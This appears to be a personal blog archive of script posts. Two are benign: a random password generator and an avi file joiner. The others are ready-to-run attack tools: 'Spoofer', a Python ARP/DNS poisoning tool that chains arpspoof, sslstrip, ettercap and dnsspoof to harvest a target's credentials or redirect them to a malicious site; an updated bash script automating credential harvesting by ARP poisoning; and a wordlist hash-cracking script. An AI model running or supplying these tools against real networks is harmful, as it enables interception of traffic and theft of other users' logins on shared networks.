14May/120
Python random password generator
Below is some code I put together to generate a random password of a user defined length.
Usage:
./pwdgen.py pw_length
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
#!/usr/bin/python
#
# basic random password generator
#
# omited captial O due to looking like
# zero in some fonts
import os, sys, string, random
pwchars = [ "a","b","c","d","e","f","g","h","i","j","k","l","m","n",
"o","p","q", "r","s","t","u","v","w","x","y","z","A", "B", "C","D",
"E","F","G","H","I","J","K","L","M","N","Q","R","S","T","U","V",
"W","X","Y","Z","1","2","3","4","5","6","7","8","9","0","!","$","&",
"*","@","#","?" ]
def pwdgen(length):
return string.join([random.choice(pwchars) for i in range(length)])
scriptname = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print "\nUsage:"
print "\t%s pw_length\n" % scriptname
else:
length = int(sys.argv[1])
print "password:", pwdgen(length).replace(' ','') |
27Mar/121
Spoofer – Automated arp / dns poisoning
I have knocked up a little menu driven python tool called spoofer. Spoofer is a fast and easy way to poison a target and harvest their credentials or forward them to a malicious site.
Here is the code:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 |
#!/usr/bin/python
#
# Usage: ./spoofer.py {adapter} {slave-ip} {gateway-ip}
# eg: ./spoofer.py waln0 10.0.0.10 10.0.0.1
#
# Requirements:
# Dnsiff (arpspoof) - sslstrip - ettercap
#
from os import system, getuid
from sys import argv, exit
from time import sleep
class colours:
bold = '\033[1m'
red = '\033[31m'
green = '\033[32m'
reset = '\033[0;0m'
def arp_cleanup():
# stop arpspoof
print "\n[+] Stopping arpspoof"
system('killall arpspoof')
sleep(1)
# set ip_forward to 0
print "[+] Stopping IPv4 forwarding"
system('echo 0 > /proc/sys/net/ipv4/ip_forward')
sleep(1)
# clear iptables rules
print "[+] Flushing iptable rules"
system("iptables -t nat -D PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
sleep(1)
# stop ssl strip
print "[+] Stopping sslstrip\n"
system('kill $(ps -ef | grep sslstrip | awk \'{print $2}\')')
sleep(1)
exit()
def dns_cleanup():
raw_input('\n[+] Hit ENTER to exit')
# stop arpspoof
print "\n[+] Stopping dnsspoof"
system('killall dnsspoof')
sleep(2)
print "[+] Stopping arpspoof"
system('killall arpspoof')
sleep(3)
# stop dnsspoof
# set ip_forward to 0
print "[+] Stopping IPv4 forwarding\n"
system('echo 0 > /proc/sys/net/ipv4/ip_forward')
sleep(1)
exit()
if getuid() != 0:
print("You need to be root (sudo %s)" % argv[0])
else:
if len(argv) < 2:
system('clear')
print("\nusage: %s adapter" % argv[0])
print("\teg: %s eth0\n" % argv[0])
else:
# set some variables
adapter = argv[1]
spooftype = 0
while spooftype != range(1,3):
system('clear')
spooftype = raw_input("\nSelect spoof type:\n\n[1] arp poison\n[2] dns spoof\n\nspoofer > ")
# arp spoof attack
if spooftype == "1":
slave = raw_input("\nEnter slave IP: > ")
gateway = raw_input("Enter gateway IP: > ")
# set rules for traffic forwarding
print "\n[+] Setting iptable rules"
system("iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
sleep(2)
# start arp poison on slave / gateway
print "[+] Starting arpspoof"
system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
sleep(2)
# start sslstrip to harvest credentials
print "[+] Starting sslstrip"
system('python /pentest/web/sslstrip/sslstrip.py -a -f -k > /dev/null 2>&1 &')
sleep(2)
# run ettercap against slave
print "[+] Starting ettercap"
system('xterm -e ettercap -T -q -i %s &' % adapter)
sleep(2)
# set ip forward mode
system('echo 1 > /proc/sys/net/ipv4/ip_forward')
sleep(1)
print colours.bold + colours.red + "\n[+] Before exiting quit ettercap gracefully. (hit Q in the ettercap window)" + colours.reset
raw_input('\n[+] Hit ENTER to exit')
# clean up
arp_cleanup()
if spooftype == "2":
slave = raw_input("\nEnter slave IP: > ")
gateway = raw_input("Enter gateway IP: > ")
# arp poison slave / gateway
print colours.bold + colours.green + "\n[+] Poisoning..." + colours.reset
system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
sleep(2)
# set ip forward mode
system('echo 1 > /proc/sys/net/ipv4/ip_forward')
sleep(1)
# start dnsspoof
system('dnsspoof -i %s -f /root/hosts.txt host %s and udp port 53 > /dev/null 2>&1 &' % (adapter, slave))
#clear up
dns_cleanup() |
Spoofer relies on you having the dsniff and sslstrip tools installed. This script runs out of the box on BackTrack and requires little modification for any other linux flavours.
13Jan/122
Python Hash Dictionary Attack
I have adapted my previous program to support sha1, sha224, sha256, sha384 and sha512 hashes, as well as md5 support. Pretty basic script that compares your hash to a wordlist returning the decrypted hash if its present in your dictionary file.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
#!/usr/bin/python
#
import hashlib, readline, os, sys
# set path to your wordlist
passlist = "/path/to/pwdlist"
def hashcrack(passlist, passhash):
pl = open(passlist, "r")
for line in pl.readlines():
line = line.strip('\n')
# define hash type
if len(passhash) == 32:
type = hashlib.md5(line)
elif len(passhash) == 40:
type = hashlib.sha1(line)
elif len(passhash) == 56:
type = hashlib.sha224(line)
elif len(passhash) == 60:
type = hashlib.sha256(line)
elif len(passhash) == 96:
type = hashlib.sha384(line)
elif len(passhash) == 128:
type = hashlib.sha512(line)
else:
print "\n[-] Invalid hash\n"
sys.exit()
# run hash against wordlist
if type.hexdigest() == passhash:
print "\n[+] Hash found. Password is: %s\n" % line
pl.close()
if __name__ == '__main__':
os.system('clear')
passhash = raw_input("Please enter a hash: ")
passhash = passhash.strip('\n')
hashcrack(passlist,passhash) |
4Jan/120
Credential harvesting via ARP poison [UPDATED]
Is it me or when your programming skills improve you find yourself looking back over past programs you created and think to yourself why didn't I do that like this? I spent a fair few hours over the past weekend re-writing some old scripts to make them more efficient.
A few months ago I wrote about credential harvesting using sslstrip and arp spoof. I posted a script that helped automate the process. Here is the updated version.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
#!/bin/bash
if [ $(whoami) == 'root' ];
then
function cleanup {
echo "[+] closing ettercap"
echo "[+] stopping sslstrip"
kill $(ps -ef | grep sslstrip | awk '{print $2}') > /dev/null 2>&1
echo "[+] flushing iptables"
iptables -t nat -D PREROUTING 1
echo "[+] stopping arpspoof"
killall arpspoof
echo 0 > /proc/sys/net/ipv4/ip_forward
exit 0
}
if [[ $# -ne 3 ]]; then
echo "usage: $0 target1 target2 interface"
exit 0
fi
clear
trap cleanup INT
echo "[+] enabling IPv4 forwarding"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "[+] ARP spoofing between $1 and $2"
arpspoof -i $3 -t $1 $2 > /dev/null 2>&1 &
echo "[+] setup iptables rules"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo "[+] starting sslstrip"
python /path/to/sslstrip/sslstrip.py -a -f -k &
echo "[+] starting ettercap"
ettercap -T -q -i $3
cleanup
else
echo "You need to be root"
fi |
2Jan/120
Script to join avi files [UPDATE]
I posted a while ago with a script to join two parts of an avi file, split files are common with downloaded video. I have modified the program so it now uses command line arguments. You can download it here.
|
1 |
Useage: ./joinavi.sh outputfile.avi inputfile1.avi inputfile2.avi |
The script:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
#!/bin/bash
if [ $# != 3 ];
then
echo -e "\033[1mUsage $0 outputfile.avi inputfile1.avi inputfile2.avi\033[0m"
exit 0
fi
# merge avi files
mencoder -forceidx -ovc copy -oac copy -o "$1" "$2" "$3"
# remove original files?
echo -e "\033[1mRemove $2 & $3? (Y/N):\033[0m"
while true; do
read removefiles
case $removefiles in
[Yy]* )
echo -e "\033[1mremoving files $2 $3...\033[0m" ;
rm "$2" "$3" ;
break ;;
[Nn]* )
echo -e "\033[1mFile $1 has been created.\033[0m" ;
break ;;
* )
echo -e "\033[1mPlease answer Y or N.\033[0m" ;;
esac
done |
It works best when copied to the /bin or /usr/local/bin directory, this lets you call it from any location.